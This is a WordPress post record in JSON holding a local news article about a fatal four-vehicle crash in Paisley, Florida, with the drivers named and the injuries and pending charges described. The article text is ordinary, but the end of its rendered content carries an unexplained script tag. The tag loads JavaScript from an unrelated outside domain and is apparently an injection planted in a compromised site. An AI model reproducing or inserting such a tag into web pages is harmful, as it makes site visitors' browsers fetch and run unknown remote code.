{"id":221562,"date":"2019-05-18T12:57:45","date_gmt":"2019-05-18T16:57:45","guid":{"rendered":"https:\/\/wordpress-1.tempurl.host\/?p=221562"},"modified":"2019-11-27T01:36:45","modified_gmt":"2019-11-27T06:36:45","slug":"three-identified-in-fatal-four-vehicle-crash-in-paisley","status":"publish","type":"post","link":"https:\/\/thegraphicgeek.com\/demo-cflwire\/three-identified-in-fatal-four-vehicle-crash-in-paisley\/","title":{"rendered":"Three Identified in Fatal Four-Vehicle Crash in Paisley"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">PAISLEY &#8212; Troopers have identified three of the people involved in a <a href=\"https:\/\/wordpress-1.tempurl.host\/roads-closed-and-power-lines-down-in-lake-county-after-fatal-crash\/\">fatal crash that occurred in Paisley early Saturday morning<\/a> leaving one dead and two hospitalized.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">According to reports, 35-year-old Joseph Furguson was traveling eastbound on County Road 42 near NFS (National Forest Service) Road 545-A when for an unknown reason, Furguson&#8217;s 2004 Dodge pickup truck traveled into the westbound lane directly into the path of three other vehicles.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">James Koon, 57, was traveling eastbound on County Road 42 when Furguson traveled into his lane. Koon, who was driving a 1986 Ford sedan and hauling a trailer, attempted to avoid colliding with Furguson, however, Furguson&#8217;s vehicle struck Koon and his trailer.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">During the collission, Koon&#8217;s trailer struck a power pole causing the power lines to fall down.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The second vehicle, a 2017 Ford SUV driven by 51-year-old Thomas Livingston also attempted evasive maneuvers and left the roadway and came to a stop in a ditch.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Furguson then collided head-on with a third vehicle, a 1997 Dodge pickup truck injuring the driver and killing the passenger.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The driver of the third vehicle, a 71-year-old Paisley man whose name has not yet been released, was airlifted to Central Florida Regional Hospital with critical injuries.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The passenger of the third vehicle who has also not yet been identified pending next-of-kin notification was pronounced dead at the scene by the Medical Examiner.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Livingston and Koon both received minor injuries and were treated by first responders.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Furguson was also airlifted to Central Florida Regional Hospital after suffering serious injuries during the collision.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">According to troopers, charges are pending against Furguson and the crash remains under investigation.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The report also indicated that the two unidentified victims and Furguson were not wearing their seatbelts at the time of the crash.<\/p>\n<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script>","protected":false},"excerpt":{"rendered":"<p>Troopers identify three of the people involved in a four-vehicle accident that left one dead, two hospitalized, and power lines down in Paisley Saturday morning.<\/p>\n","protected":false},"author":1,"featured_media":215130,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"wds_primary_category":0,"footnotes":""},"categories":[3246,3245,325,6,1],"tags":[],"class_list":["post-221562","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-community","category-crime","category-florida-news","category-lake-county","category-local","entry","rows"],"jetpack_featured_media_url":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-content\/uploads\/sites\/6\/2017\/08\/fhp11-e1528006191720.jpg","jetpack_sharing_enabled":true,"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/posts\/221562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/comments?post=221562"}],"version-history":[{"count":0,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/posts\/221562\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/media\/215130"}],"wp:attachment":[{"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/media?parent=221562"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/categories?post=221562"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thegraphicgeek.com\/demo-cflwire\/wp-json\/wp\/v2\/tags?post=221562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
